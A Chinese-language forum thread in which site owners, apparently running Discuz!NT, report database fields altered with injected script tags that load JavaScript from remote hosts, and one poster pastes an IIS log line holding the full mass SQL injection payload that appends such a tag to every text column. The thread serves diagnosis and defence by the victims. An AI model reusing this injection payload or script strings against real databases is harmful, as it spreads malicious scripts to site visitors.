数据库遭到攻击 求救雪人以及各路高手!

表的字段的值后面被加上
</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!

楼上没有装DISCUZ么?

我也求救呀...我们数据库也一样
5号 被改成 </title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--
6号 被改成 </title></pre>><script scr=http</title></pre>><script src=http://sb.5252.ws8/107/1.js></script><
7号 被改成 </title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
服务器没毒没木马.漏洞都有及时更新.偏偏数据库里一个中招.其他同样的没事..=.=实在是郁闷..求救呀...

打开论坛站点的IIS日志记录功能

数据库被修改后，仔细检查IIS日志，看看有没有特别长的页面请求地址

一般这样可以看出来是不是通过页面提交方式注入的，如果是，那就说明NT有漏洞

如果日志里没有发现

可能就是服务器安全出问题了

只是个建议

我的也是一样的情况,晕死了

DISCUZ!NT1.1有漏洞

请楼上的都说明自己中招的版本极其情况

我已经查出问题所在 请各位把你们的QQ号码发站内短讯给我!

，不会是discuznt有漏洞把

怎么还没有提供解决方案，急死人了。。。。

我的也中了的类式的代码哈!我看了iis
记录如下:20:52 W3SVC965161196 125.65.46.56 GET /trav/storyfile.aspx fileid=1&recordid=51;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.241.156.204 Mozilla/4.0 302 0 0

我也中了几天了!  大侠们快现身吧!